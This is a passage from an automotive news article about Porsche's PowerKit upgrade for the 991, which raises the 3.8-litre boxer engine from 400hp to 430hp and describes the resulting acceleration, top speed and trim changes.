Seems though that Porsche has now decided there is yet more to come out of the 991, courtesy of the new PowerKit. Diving straight into the important bits, this new kit takes the 400hp from the stock 3.8l six-cylinder boxer engine and raises it to 430hp.
The new PowerKit – essentially new cyclinder heads, camshafts and an additional radiator among others – means the 991’s 0-100kph time has been lowered to just 4s, and achieves a new 308kph top speed. Pop the hood and you’ll also find new titanium colour carbon inlays and engine cover.
And we know you’ll all be mightily concerned how this extra injection has affected fuel economy. Fret not. Porsche has got that covered too.
